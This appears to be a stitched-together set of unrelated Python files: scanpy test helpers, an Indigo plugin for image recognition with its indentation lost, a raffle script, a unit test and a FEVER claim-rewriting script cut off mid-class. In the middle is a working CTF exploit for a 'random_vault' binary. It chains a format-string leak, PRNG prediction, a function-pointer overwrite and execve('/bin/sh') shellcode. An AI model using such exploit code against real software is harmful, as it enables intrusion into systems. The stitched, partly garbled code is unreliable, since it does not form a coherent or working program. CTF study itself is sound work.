alphabet_position("The sunset sets at twelve o' clock.")
Should return "20 8 5 19 21 14 19 5 20 19 5 20 19 1 20 20 23 5 12 22 5 15 3 12 15 3 11" (as a string)
'''
def alphabet_position(text):
    """Replace every ASCII letter in *text* with its 1-based position in the
    alphabet ("a" = 1 ... "z" = 26) and return the positions space-separated.

    Any character that is not a letter is ignored.  (The previous version
    did a linear list lookup per letter and crashed with ValueError on
    non-ASCII alphabetic characters instead of ignoring them.)
    """
    # ord(ch) - ord('a') + 1 maps 'a' -> 1 ... 'z' -> 26.
    return " ".join(
        str(ord(ch) - ord('a') + 1)
        for ch in text.lower()
        if 'a' <= ch <= 'z'
    )
"""
This file contains helper functions for the scanpy test suite.
"""
from itertools import permutations
import scanpy as sc
import numpy as np
import warnings
import pytest
from anndata.tests.helpers import asarray, assert_equal
from scanpy.tests._data._cached_datasets import pbmc3k
# TODO: Report more context on the fields being compared on error
# TODO: Allow specifying paths to ignore on comparison
###########################
# Representation choice
###########################
# These functions can be used to check that functions are correctly using arguments like `layers`, `obsm`, etc.
def check_rep_mutation(func, X, *, fields=("layer", "obsm"), **kwargs):
    """Check that only the array meant to be modified is modified.

    Runs *func* once targeting ``adata.X`` and once per representation in
    *fields*, then asserts each run changed exactly its own target array and
    left all other representations equal to the original input.

    The default was previously a mutable list; a tuple avoids the
    shared-mutable-default pitfall.
    """
    adata = sc.AnnData(X=X.copy(), dtype=X.dtype)
    for field in fields:
        sc.get._set_obs_rep(adata, X, **{field: field})
    X_array = asarray(X)
    adata_X = func(adata, copy=True, **kwargs)
    adatas_proc = {
        field: func(adata, copy=True, **{field: field}, **kwargs) for field in fields
    }
    # Modified fields: each processed representation must match processed X.
    for field in fields:
        result_array = asarray(
            sc.get._get_obs_rep(adatas_proc[field], **{field: field})
        )
        np.testing.assert_array_equal(asarray(adata_X.X), result_array)
    # Unmodified fields must still equal the original input.
    for field in fields:
        np.testing.assert_array_equal(X_array, asarray(adatas_proc[field].X))
        np.testing.assert_array_equal(
            X_array, asarray(sc.get._get_obs_rep(adata_X, **{field: field}))
        )
    for field_a, field_b in permutations(fields, 2):
        result_array = asarray(
            sc.get._get_obs_rep(adatas_proc[field_a], **{field_b: field_b})
        )
        np.testing.assert_array_equal(X_array, result_array)
def check_rep_results(func, X, *, fields=("layer", "obsm"), **kwargs):
    """Checks that the results of a computation add values/ mutate the anndata
    object in a consistent way regardless of which representation is targeted.

    The default was previously a mutable list; a tuple avoids the
    shared-mutable-default pitfall.
    """
    # Gen data: all representations start empty; only the target holds X.
    empty_X = np.zeros(shape=X.shape, dtype=X.dtype)
    adata = sc.AnnData(
        X=empty_X.copy(),
        layers={"layer": empty_X.copy()},
        obsm={"obsm": empty_X.copy()},
    )
    adata_X = adata.copy()
    adata_X.X = X.copy()
    adatas_proc = {}
    for field in fields:
        cur = adata.copy()
        sc.get._set_obs_rep(cur, X.copy(), **{field: field})
        adatas_proc[field] = cur
    # Apply function
    func(adata_X, **kwargs)
    for field in fields:
        func(adatas_proc[field], **{field: field}, **kwargs)
    # Reset X so only the function's additions are compared below.
    adata_X.X = empty_X.copy()
    for field in fields:
        sc.get._set_obs_rep(adatas_proc[field], empty_X.copy(), **{field: field})
    for field_a, field_b in permutations(fields, 2):
        assert_equal(adatas_proc[field_a], adatas_proc[field_b])
    for field in fields:
        assert_equal(adata_X, adatas_proc[field])
def _prepare_pbmc_testdata(sparsity_func, dtype, small=False):
    """Prepares 3k PBMC dataset with batch key `batch` and defined datatype/sparsity.

    Params
    ------
    sparsity_func
        sparsity function applied to adata.X (e.g. csr_matrix.toarray for dense or csr_matrix for sparse)
    dtype
        numpy dtype applied to adata.X (e.g. 'float32' or 'int64')
    small
        False (default) returns full data, True returns small subset of the data."""
    adata = pbmc3k().copy()
    if small:
        adata = adata[:1000, :500]
        # Subsetting can leave cells with no counts; drop them.
        sc.pp.filter_cells(adata, min_genes=1)
    # Seed immediately before the draw so `batch` labels are reproducible.
    np.random.seed(42)
    adata.obs['batch'] = np.random.randint(0, 3, size=adata.shape[0])
    sc.pp.filter_genes(adata, min_cells=1)
    # Apply the requested storage format and dtype last.
    adata.X = sparsity_func(adata.X.astype(dtype))
    return adata
def _check_check_values_warnings(function, adata, expected_warning, kwargs={}):
'''Runs `function` on `adata` with provided arguments `kwargs` twice: once with `check_values=True` and once with `check_values=False`. Checks that the `expected_warning` is only raised whtn `check_values=True`.'''
# expecting 0 no-int warnings
with warnings.catch_warnings(record=True) as record:
function(adata.copy(), **kwargs, check_values=False)
warning_msgs = [w.message.args[0] for w in record]
assert expected_warning not in warning_msgs
# expecting 1 no-int warning
with warnings.catch_warnings(record=True) as record:
function(adata.copy(), **kwargs, check_values=True)
warning_msgs = [w.message.args[0] for w in record]
assert expected_warning in warning_msgs
|
#! /usr/bin/env python
####################
import indigo
import os
import sys
import datetime
import time
import json
import copy
from copy import deepcopy
import requests
from ImageProcessingAdapter import ImageProcessingOptions
from GoogleVisionAdapter import GoogleImageProcessingAdapter
from AWSRekognitionAdapter import AWSImageProcessingAdapter
from distutils.version import LooseVersion
# Update-check interval; used as an hours staleness window in version_check
# (NOTE(review): also used directly as a seconds sleep in runConcurrentThread
# — confirm whether that is intended).
DEFAULT_UPDATE_FREQUENCY = 24 # frequency of update check
# Template for a freshly created event definition.  Values are stored as
# strings because EVENTS round-trips through JSON in the plugin prefs.
emptyEVENT = {
    "eventType": "OCR",
    "OCR" : "",
    "label" : "",
    "logo" : "",
    "notLabel": "0",
    "labelScore" : ".9",
    "logoScore" : ".9",
    "faceScore" : ".9",
    "noFace" : "0",
    "enableDisable" : "0"
}
################################################################################
class Plugin(indigo.PluginBase):
########################################
def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):
super(Plugin, self).__init__(pluginId, pluginDisplayName, pluginVersion, pluginPrefs)
self.debug = pluginPrefs.get("chkDebug", False)
self.lastUpdateCheck = None
self.pollingInterval = 60
self.configServices(pluginPrefs)
self.currentEventN = "0"
if "EVENTS" in self.pluginPrefs:
self.EVENTS = json.loads(self.pluginPrefs["EVENTS"])
else:
self.EVENTS = {}
########################################
def startup(self):
self.debugLog(u"startup called")
self.version_check()
def checkForUpdates(self):
self.version_check()
def version_check(self):
pluginId = self.pluginId
self.lastUpdateCheck = datetime.datetime.now()
# Create some URLs we'll use later on
current_version_url = "https://api.indigodomo.com/api/v2/pluginstore/plugin-version-info.json?pluginId={}".format(pluginId)
store_detail_url = "https://www.indigodomo.com/pluginstore/{}/"
try:
# GET the url from the servers with a short timeout (avoids hanging the plugin)
reply = requests.get(current_version_url, timeout=5)
# This will raise an exception if the server returned an error
reply.raise_for_status()
# We now have a good reply so we get the json
reply_dict = reply.json()
plugin_dict = reply_dict["plugins"][0]
# Make sure that the 'latestRelease' element is a dict (could be a string for built-in plugins).
latest_release = plugin_dict["latestRelease"]
if isinstance(latest_release, dict):
# Compare the current version with the one returned in the reply dict
if LooseVersion(latest_release["number"]) > LooseVersion(self.pluginVersion):
# The release in the store is newer than the current version.
# We'll do a couple of things: first, we'll just log it
self.logger.info(
"A new version of the plugin (v{}) is available at: {}".format(
latest_release["number"],
store_detail_url.format(plugin_dict["id"])
)
)
except Exception as exc:
self.logger.error(unicode(exc))
def runConcurrentThread(self):
self.logger.debug("Starting concurrent tread")
self.sleep(1)
try:
while True:
self.sleep(int(DEFAULT_UPDATE_FREQUENCY + 1))
if self.lastUpdateCheck < datetime.datetime.now()-datetime.timedelta(hours=DEFAULT_UPDATE_FREQUENCY):
self.version_check()
except self.StopThread:
self.logger.debug("Received StopThread")
def shutdown(self):
self.pluginPrefs["EVENTS"] = json.dumps(self.EVENTS)
self.debugLog(u"shutdown called")
def deviceStartComm(self, dev):
self.debugLog(u"deviceStartComm: %s" % (dev.name,))
########################################
def validateDeviceConfigUi(self, valuesDict, typeId, devId):
return (True, valuesDict)
def updateConfig(self, valuesDict):
return valuesDict
def closedPrefsConfigUi(self, valuesDict, userCancelled):
if not userCancelled:
self.configServices(valuesDict)
self.debug = valuesDict["chkDebug"]
def configServices(self, pluginPrefs):
self.imageProcessors = []
APIKey = pluginPrefs.get("GoogleAPIKey", None)
if APIKey is not None:
self.imageProcessors.append(GoogleImageProcessingAdapter(self.logger, [APIKey]))
APIKey = pluginPrefs.get("AWSAPIKey", None)
APIKey2 = pluginPrefs.get("AWSSecretAPIKey", None)
if APIKey is not None:
self.imageProcessors.append(AWSImageProcessingAdapter(self.logger, [APIKey, APIKey2]))
def eventConfigCallback(self, valuesDict,typeId=""):
self.currentEventN=str(valuesDict["selectEvent"])
if self.currentEventN =="0":
errorDict = valuesDict
return valuesDict
if not self.currentEventN in self.EVENTS:
self.EVENTS[self.currentEventN]= copy.deepcopy(emptyEVENT)
valuesDict["eventType"] = str(self.EVENTS[self.currentEventN]["eventType"])
valuesDict["OCR"] = str(self.EVENTS[self.currentEventN]["OCR"])
valuesDict["label"] = str(self.EVENTS[self.currentEventN]["label"])
valuesDict["logo"] = str(self.EVENTS[self.currentEventN]["logo"])
valuesDict["notLabel"] = str(self.EVENTS[self.currentEventN]["notLabel"])
valuesDict["labelScore"] = str(self.EVENTS[self.currentEventN]["labelScore"])
valuesDict["faceScore"] = str(self.EVENTS[self.currentEventN]["faceScore"])
valuesDict["logoScore"] = str(self.EVENTS[self.currentEventN]["logoScore"])
valuesDict["noFace"] = self.EVENTS[self.currentEventN]["noFace"]
valuesDict["enableDisable"] = self.EVENTS[self.currentEventN]["enableDisable"]
self.updatePrefs =True
return valuesDict
def getMenuActionConfigUiValues(self, menuId):
#indigo.server.log(u'Called getMenuActionConfigUiValues(self, menuId):')
#indigo.server.log(u' (' + unicode(menuId) + u')')
valuesDict = indigo.Dict()
valuesDict["selectEvent"] = "0"
valuesDict["eventType"] = "0"
valuesDict["enableDisable"] = "0"
errorMsgDict = indigo.Dict()
return (valuesDict, errorMsgDict)
def sendImageAction(self, pluginAction, dev):
result = None
processOCR = False
processFace = False
processLabel = False
processLogo = False
for i in self.EVENTS:
evnt = self.EVENTS[i]
if pluginAction.props["event" + str(i)]:
if evnt["eventType"] == "OCR":
processOCR = True
if evnt["eventType"] == "Face":
processFace = True
if evnt["eventType"] == "Label":
processLabel = True
if evnt["eventType"] == "Logo":
processLogo = True
if not (processOCR or processLabel or processLogo or processFace):
self.logger.error("No configured events for this action")
return
options = ImageProcessingOptions(processOCR, processFace, processLabel, processLogo)
image = None
if pluginAction.props["locationOption"] == "static":
image = pluginAction.props["location"]
else:
image = indigo.variables[int(pluginAction.props["locationVariable"])].value
### SEND TO GOOGLE
if pluginAction.pluginTypeId == "sendImageGoogle":
imageProcessor = None
for processor in self.imageProcessors:
if isinstance(processor, GoogleImageProcessingAdapter):
imageProcessor = processor
if imageProcessor == None:
indigo.server.log("Not properly configured for Google Vision API")
return
indigo.server.log("sending " + image + " to Google Vision API")
result = imageProcessor.sendImage(image, options)
### SEND TO AWS
elif pluginAction.pluginTypeId == "sendImageAWS":
imageProcessor = None
for processor in self.imageProcessors:
if isinstance(processor, AWSImageProcessingAdapter):
imageProcessor = processor
if imageProcessor == None:
indigo.server.log("Not properly configured for AWS Rekognition API")
return
indigo.server.log("sending " + image + " to AWS Rekognition API")
result = imageProcessor.sendImage(image, options)
if result is None:
self.logger.error("Returned no results")
return
### PROCESS RESULTS
buildstr = ""
facecounter = 0
resultsFound = False
## OUTPUT TO INDIGO
if len(result.Label_Results) > 0:
resultsFound = True
for lbl in result.Label_Results:
buildstr += lbl.description + " (score:" + str(lbl.confidence) +"), "
indigo.server.log("Label Results: " + buildstr[:-2])
buildstr = ""
if len(result.OCR_Results) > 0:
resultsFound = True
for ocr in result.OCR_Results:
buildstr += ocr.description.replace('\n','') + " (language:" + ocr.other + "), "
indigo.server.log("OCR Results: " + buildstr[:-2])
buildstr = ""
if len(result.Face_Results) > 0:
resultsFound = True
for face in result.Face_Results:
facecounter += 1
buildstr += "Face " + str(facecounter) + " with confidence of " + str(face.Confidence) + ". "
buildstr = "Found a total of " + str(facecounter) + " face(s). " + buildstr
indigo.server.log("Face Results: " + buildstr[:-2])
buildstr = ""
if len(result.Logo_Results) > 0:
resultsFound = True
for logo in result.Logo_Results:
buildstr += logo.description + " (score:" + str(logo.confidence) + ", language: " + logo.other + "), "
indigo.server.log("Logo Results: " + buildstr[:-2])
buildstr = ""
if not resultsFound:
indigo.server.log("No results found in image.")
for trigger in indigo.triggers.iter("self"):
eventID = trigger.pluginTypeId[5:].strip()
# self.logger.debug("size of self.EVENTS: " + str(len(self.EVENTS)) + " , eventID: " + eventID)
if int(eventID) <= len(self.EVENTS):
eventType = self.EVENTS[eventID]["eventType"]
else:
self.logger.error("Trigger '" + trigger.name + "'' is configured for a disabled Google Vision event, skipping...")
continue
if not self.EVENTS[eventID]["enableDisable"]:
self.logger.error("Trigger '" + trigger.name + "'' is configured for a disabled Google Vision event, skipping...")
continue
if not pluginAction.props["event" + eventID]:
self.logger.debug("Trigger '" + trigger.name + "' is not applicable for event " + eventID + ", skipping...")
continue
self.logger.debug("Evaluating trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
if eventType == "OCR":
ocrSearch = self.EVENTS[eventID]["OCR"]
if len(result.OCR_Results) > 0:
for ocr in result.OCR_Results:
if ocrSearch.lower() in ocr.description.lower():
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
break
elif eventType == "Face":
if facecounter == 0 and self.EVENTS[eventID]["noFace"]:
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
elif facecounter == 0:
continue
else:
for face in result.Face_Results:
if face.detectionConfidence >= float(self.EVENTS[eventID]["faceScore"]):
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
break
elif eventType == "Label":
foundLabel = False
if len(result.Label_Results) > 0:
for lbl in result.Label_Results:
if len(self.EVENTS[eventID]["label"]) > 0:
for lblSearch in self.EVENTS[eventID]["label"].replace(" ", "").split(","):
if lblSearch.lower() == lbl.description.lower() and lbl.confidence >= float(self.EVENTS[eventID]["labelScore"]):
self.logger.debug("Trigger '" + trigger.name + "' Found label of interest: " + lblSearch)
foundLabel = True
if (foundLabel and not self.EVENTS[eventID]["notLabel"]) or (not foundLabel and self.EVENTS[eventID]["notLabel"]):
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
elif eventType == "Logo":
foundLogo = False
self.logger.debug("Looking for logos: " + self.EVENTS[eventID]["txtLogo"])
if len(result.Logo_Results) > 0:
for logo in result.Logo_Results:
if len(self.EVENTS[eventID]["logo"]) > 0:
for logoSearch in self.EVENTS[eventID]["logo"].replace(" ", "").split(","):
if logoSearch.lower() == logo.description.lower() and logo.confidence >= float(self.EVENTS[eventID]["logoScore"]):
self.logger.debug("Found logo of interest: " + logoSearch)
foundLogo = True
if foundLogo:
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
########################################
def buttonConfirmDevicesCALLBACK(self, valuesDict,typeId=""):
    """ConfigUI button callback: save the currently selected event into
    self.EVENTS, or delete it when the DeleteEvent checkbox is set.

    valuesDict: the dialog's current field values (indigo Dict-like).
    typeId:     unused; present to satisfy the indigo callback signature.
    Returns valuesDict, or (valuesDict, errorDict) when a fallback default
    was substituted for an empty field.
    """
    errorDict=indigo.Dict()
    # Event id currently selected in the dialog; "0" / "" means no selection.
    self.currentEventN=str(valuesDict["selectEvent"])
    if self.currentEventN == "0" or self.currentEventN =="":
        return valuesDict
    # First time this event id is touched: seed it from the empty template.
    if not self.currentEventN in self.EVENTS:
        self.EVENTS[self.currentEventN] = copy.deepcopy(emptyEVENT)
    if valuesDict["DeleteEvent"]:
        # Delete path: reset every dialog field to its default value...
        valuesDict["DeleteEvent"] = False
        valuesDict["eventType"] = "OCR"
        valuesDict["OCR"] = ""
        valuesDict["label"] = ""
        valuesDict["logo"] = ""
        valuesDict["notLabel"] = False
        valuesDict["labelScore"] = .90
        valuesDict["logoScore"] = .90
        valuesDict["faceScore"] = .90
        valuesDict["enableDisable"] = False
        valuesDict["noFace"] = False
        # ...and wipe the stored event back to the empty template.
        self.EVENTS[self.currentEventN] = copy.deepcopy(emptyEVENT)
        self.currentEventN ="0"
        valuesDict["selectEvent"] ="0"
        # NOTE(review): this path writes key "EVENT" while the save path
        # below writes "EVENTS" — confirm which key the ConfigUI actually
        # reads; one of the two looks like a typo.
        valuesDict["EVENT"] =json.dumps(self.EVENTS)
        return valuesDict
    ##### not delete
    # Save path: copy each dialog field into the stored event.
    # enableDisable falls back to the template default when empty; the
    # substituted default is also reported through errorDict.
    if valuesDict["enableDisable"] != "": self.EVENTS[self.currentEventN]["enableDisable"] = valuesDict["enableDisable"]
    else: self.EVENTS[self.currentEventN]["enableDisable"] = emptyEVENT["enableDisable"]; valuesDict["enableDisable"] = emptyEVENT["enableDisable"];errorDict["enableDisable"]=emptyEVENT["enableDisable"]
    self.EVENTS[self.currentEventN]["eventType"] = valuesDict["eventType"]
    self.EVENTS[self.currentEventN]["OCR"] = valuesDict["OCR"]
    self.EVENTS[self.currentEventN]["label"] = valuesDict["label"]
    self.EVENTS[self.currentEventN]["logo"] = valuesDict["logo"]
    self.EVENTS[self.currentEventN]["notLabel"] = valuesDict["notLabel"]
    self.EVENTS[self.currentEventN]["labelScore"] = valuesDict["labelScore"]
    self.EVENTS[self.currentEventN]["logoScore"] = valuesDict["logoScore"]
    self.EVENTS[self.currentEventN]["faceScore"] = valuesDict["faceScore"]
    self.EVENTS[self.currentEventN]["noFace"] = valuesDict["noFace"]
    # enableDisable was already stored above; this repeats the assignment.
    self.EVENTS[self.currentEventN]["enableDisable"] = valuesDict["enableDisable"]
    valuesDict["EVENTS"] = json.dumps(self.EVENTS)
    if len(errorDict) > 0: return valuesDict, errorDict
    return valuesDict
|
import csv
import sys
from random import choice


def draw_winner(contestants):
    """Pick a uniformly random row from *contestants*, remove it from the
    list in place, and return it.

    Raises IndexError when *contestants* is empty (callers should guard).
    """
    winner = choice(contestants)
    contestants.remove(winner)
    return winner


def main(path):
    """Raffle driver: read all rows from the CSV at *path*, draw one
    winner, rewrite the file without the winning row, and print the
    winner's name (first column)."""
    with open(path, 'r', newline='') as infile:
        contestants = list(csv.reader(infile))
    if not contestants:
        # The original crashed with a bare IndexError here; fail clearly.
        sys.exit("No contestants left in " + path)
    winner = draw_winner(contestants)
    with open(path, 'w', newline='') as outfile:
        csv.writer(outfile, delimiter=',').writerows(contestants)
    print(winner[0])


# Guarded entry point so importing this module has no side effects.
if __name__ == "__main__":
    main(sys.argv[1])
|
from ptrlib import *
import ctypes

# Exploit for the "random_vault" CTF challenge.  The host glibc is loaded
# so srand/rand reproduce the target's PRNG sequence (assumes the target
# uses the same libc 2.27).
glibc = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc-2.27.so')
sock = Process("./random_vault")
# leak proc: format-string leak; %11$p prints a stack value at a fixed
# delta (0x1750) from the program's load address, defeating PIE.
sock.sendlineafter(": ", "%11$p")
sock.recvuntil("Hello, ")
proc_base = int(sock.recvline(), 16) - 0x1750
# NOTE(review): `logger` is assumed to come from ptrlib's wildcard import.
logger.info("proc = " + hex(proc_base))
# set seed: the target presumably seeds with time(0); mirroring it locally
# predicts the 7 random 8-byte-aligned vault slot offsets — confirm against
# the binary.
sock.sendlineafter("Quit\n", "3")
glibc.srand(glibc.time(0))
offset = [(glibc.rand() & 0xff) * 8 for i in range(7)]
# overwrite function pointer: point proc_base+0x5000 into the vault data
# area (proc_base+0x5010+offset[0]) where the first shellcode slot lands.
payload = fsb(
    pos = 24,
    writes = {proc_base + 0x5000: proc_base + 0x5010 + offset[0]},
    written = 0,
    bs = 2,
    null = False,
    bits = 64
)
sock.sendlineafter("Quit\n", "1")
sock.sendlineafter(": ", payload)
sock.recvuntil("Actions:")
# write shellcode stage 1: "mov rsi, rdx; jmp rel32" — the rel32 hops from
# slot 0 to slot 1; negative distances are encoded as two's complement.
x = offset[1] - offset[0] - 8
sc1 = u64(b"\x48\x89\xd6\xe9" + p32(x if x > 0 else (0xffffffff ^ (-x)) + 1))
# stage 2: "xor edx,edx; mov dh,0xff; xor edi,edi; syscall" — sets up a
# 0xff00-byte read into the buffer (presumably rax is already 0; confirm).
sc2 = u64(b"\x31\xd2\xb6\xff\x31\xff\x0f\x05")
sock.sendlineafter("Quit\n", "2")
sock.sendlineafter(": ", str(sc1))
sock.sendlineafter(": ", str(sc2))
# Fill the remaining 5 vault slots with zeros.
for i in range(5):
    sock.sendlineafter(": ", str(0))
# send second stage: NOP sled up to slot 1, then a standard 27-byte
# execve("/bin/sh") shellcode.
shellcode = b'\x90' * (offset[1] + 8)
shellcode += b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
sock.recvline()
sock.recvline()
sock.send(shellcode)
sock.interactive()
|
import unittest
from utils import is_square
class TestIsSquare(unittest.TestCase):
    """Unit tests for utils.is_square."""

    def test_is_square(self):
        """Check is_square on the original mix of squares and non-squares.

        Table-driven replacement for nine copy-pasted asserts; each value
        runs in its own subTest so one failure does not mask the rest.
        """
        cases = [
            (1, True), (2, False), (3, False), (4, True), (6, False),
            (7, False), (8, False), (9, True), (81, True),
        ]
        for value, expected in cases:
            with self.subTest(value=value):
                # assertTrue/assertFalse keep the original truthiness
                # semantics (is_square may return any truthy/falsy value).
                if expected:
                    self.assertTrue(is_square(value))
                else:
                    self.assertFalse(is_square(value))
# Allow running this test module directly: python <this file>
if __name__ == '__main__':
    unittest.main()
|
import json
import os
import re
import spacy
from argparse import ArgumentParser
from copy import deepcopy
from tqdm import tqdm
# CLI: --in-file is a JSONL file of FEVER claim instances; --out-dir is the
# directory that receives the per-rule changed/unchanged JSONL files
# (created below if missing).
parser = ArgumentParser()
parser.add_argument("--in-file",type=str)
parser.add_argument("--out-dir",type=str)
args = parser.parse_args()
# Small English spaCy pipeline; the Birth*/Death* rules use its NER to
# decide whether a claim mentions a place or a date.
nlp = spacy.load('en_core_web_sm')
if not os.path.exists(args.out_dir):
    os.makedirs(args.out_dir)
class ReplacementRule:
    """Abstract base class for claim rewriting rules.

    A rule inspects a FEVER claim instance (a dict carrying at least
    "claim" and "label") and either returns a rewritten instance or None
    when the rule does not apply.
    """

    def name(self):
        """Stable identifier for this rule (used to build file names)."""
        raise NotImplementedError("NotImplemented")

    def process_instance(self, instance):
        """Public entry point; delegates to the subclass hook."""
        return self._process(instance)

    def _process(self, instance):
        """Subclass hook implementing the actual rewrite."""
        raise NotImplementedError("Not implemented here")
def _apply_negation(instance, patterns):
    """Rewrite a claim into a negated paraphrase and flip its label.

    *patterns* is an ordered list of ``(regex, template)`` pairs; the first
    regex that matches ``instance["claim"]`` wins.  Its template is
    formatted with ``{0}`` = regex group 2 (the category, periods stripped)
    and ``{1}`` = regex group 1 (the entity, unmodified), mirroring the
    original per-rule code.  Because the paraphrase negates the claim, the
    label is swapped (SUPPORTS <-> REFUTES).

    Returns the mutated instance, or None when the label is
    "NOT ENOUGH INFO" or no pattern matches.
    """
    if instance["label"] == "NOT ENOUGH INFO":
        return None
    for pattern, template in patterns:
        match = re.match(pattern, instance["claim"])
        if match is not None:
            instance["claim"] = template.format(
                match.group(2).replace(".", ""), match.group(1))
            instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
            return instance
    return None


class IsAReplacementRule1(ReplacementRule):
    """'X is a/an Y.' -> 'There does not exist a/an Y called X.'"""

    def _process(self, instance):
        # "is a" is tried before "is an", matching the original precedence.
        return _apply_negation(instance, [
            (r"(.+) is a (.+)", "There does not exist a {0} called {1}."),
            (r"(.+) is an (.+)", "There does not exist an {0} called {1}."),
        ])

    def name(self):
        return "there.does.not.exist.a.called"


class IsAReplacementRule2(ReplacementRule):
    """'X is a/an Y.' -> 'There exists no Y called X.' (article dropped)."""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) is (?:a|an) (.+)", "There exists no {0} called {1}."),
        ])

    def name(self):
        return "there.exists.no.a.called"


class IsAReplacementRule3(ReplacementRule):
    """'X is a/an Y.' -> 'There does not exist a/an Y that goes by the name of X.'"""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) is a (.+)", "There does not exist a {0} that goes by the name of {1}."),
            (r"(.+) is an (.+)", "There does not exist an {0} that goes by the name of {1}."),
        ])

    def name(self):
        return "there.not.exist.named"


class IsAReplacementRule4(ReplacementRule):
    """'X is a/an Y.' -> 'There is not a/an Y called X.'"""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) is a (.+)", "There is not a {0} called {1}."),
            (r"(.+) is an (.+)", "There is not an {0} called {1}."),
        ])

    def name(self):
        return "there.is.not.called"


class IsAReplacementRule5(ReplacementRule):
    """'X is a/an Y.' -> 'There is not a/an Y that goes by the name of X.'"""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) is a (.+)", "There is not a {0} that goes by the name of {1}."),
            (r"(.+) is an (.+)", "There is not an {0} that goes by the name of {1}."),
        ])

    def name(self):
        return "there.is.not.by.name"


class WasAReplacementRule1(ReplacementRule):
    """Past-tense variant of IsAReplacementRule1 ('was a/an')."""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) was a (.+)", "There did not exist a {0} called {1}."),
            (r"(.+) was an (.+)", "There did not exist an {0} called {1}."),
        ])

    def name(self):
        return "was.there.does.not.exist.a.called"


class WasAReplacementRule2(ReplacementRule):
    """Past-tense variant of IsAReplacementRule2."""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) was (?:a|an) (.+)", "There existed no {0} called {1}."),
        ])

    def name(self):
        return "was.there.exists.no.a.called"


class WasAReplacementRule3(ReplacementRule):
    """Past-tense variant of IsAReplacementRule3."""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) was a (.+)", "There did not exist a {0} that goes by the name of {1}."),
            (r"(.+) was an (.+)", "There did not exist an {0} that goes by the name of {1}."),
        ])

    def name(self):
        return "was.there.not.exist.named"


class WasAReplacementRule4(ReplacementRule):
    """Past-tense variant of IsAReplacementRule4."""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) was a (.+)", "There was not a {0} called {1}."),
            (r"(.+) was an (.+)", "There was not an {0} called {1}."),
        ])

    def name(self):
        return "was.there.is.not.called"


class WasAReplacementRule5(ReplacementRule):
    """Past-tense variant of IsAReplacementRule5 ('went by the name of')."""

    def _process(self, instance):
        return _apply_negation(instance, [
            (r"(.+) was a (.+)", "There was not a {0} that went by the name of {1}."),
            (r"(.+) was an (.+)", "There was not an {0} that went by the name of {1}."),
        ])

    def name(self):
        return "was.there.is.not.by.name"
# Shared pattern: '<film> was/is directed by <director>' (verb optional).
_DIRECTED_BY_RE = r"(.+) (?:was|is)? directed by (.+)"


def _apply_directed_by(instance, template):
    """Negate a '<film> directed by <director>' claim and flip its label.

    *template* is formatted with {0} = the film (regex group 1) and
    {1} = the director (regex group 2), both with periods stripped.
    Returns the mutated instance, or None when the label is
    "NOT ENOUGH INFO" or the claim does not match.
    """
    if instance["label"] == "NOT ENOUGH INFO":
        return None
    match = re.match(_DIRECTED_BY_RE, instance["claim"])
    if match is None:
        return None
    instance["claim"] = template.format(
        match.group(1).replace(".", ""), match.group(2).replace(".", ""))
    instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
    return instance


class DirectedBy1(ReplacementRule):
    def _process(self, instance):
        return _apply_directed_by(
            instance, "There is a movie called {0} which is not directed by {1}.")

    def name(self):
        return "directedby1"


class DirectedBy2(ReplacementRule):
    def _process(self, instance):
        return _apply_directed_by(
            instance, "There is a movie called {0} which wasn't directed by {1}.")

    def name(self):
        return "directedby2"


class DirectedBy3(ReplacementRule):
    def _process(self, instance):
        return _apply_directed_by(
            instance, "There is a movie called {0}, {1} has no involvement in the production.")

    def name(self):
        return "directedby3"


class DirectedBy4(ReplacementRule):
    # Director-first phrasing: {1} (director) precedes {0} (film).
    def _process(self, instance):
        return _apply_directed_by(
            instance, "There is a director, {1}, who was not involved in the production of {0}.")

    def name(self):
        return "directedby4"


class DirectedBy5(ReplacementRule):
    def _process(self, instance):
        return _apply_directed_by(
            instance, "There is a person involved in the movie industry, {1}, who was not the director of {0}.")

    def name(self):
        return "directedby5"
# Shared pattern: '<person> starred/stars in <film>'.
_STARRED_IN_RE = r"(.+) (?:starred|stars) in (.+)"


def _apply_starred_in(instance, template):
    """Rewrite a '<person> starred in <film>' claim and flip its label.

    *template* is formatted with {0} = the person (regex group 1) and
    {1} = the film (regex group 2), both with periods stripped.
    Returns the mutated instance, or None when the label is
    "NOT ENOUGH INFO" or the claim does not match.
    """
    if instance["label"] == "NOT ENOUGH INFO":
        return None
    match = re.match(_STARRED_IN_RE, instance["claim"])
    if match is None:
        return None
    instance["claim"] = template.format(
        match.group(1).replace(".", ""), match.group(2).replace(".", ""))
    instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
    return instance


class StarredIn1(ReplacementRule):
    # NOTE(review): unlike the other rules this template is NOT a negation,
    # yet the label is still flipped — preserved exactly from the original;
    # verify whether that was intended.
    def _process(self, instance):
        return _apply_starred_in(
            instance, "There is a person, {0}, that starred in {1}.")

    def name(self):
        return "starredin1"


class StarredIn2(ReplacementRule):
    def _process(self, instance):
        return _apply_starred_in(
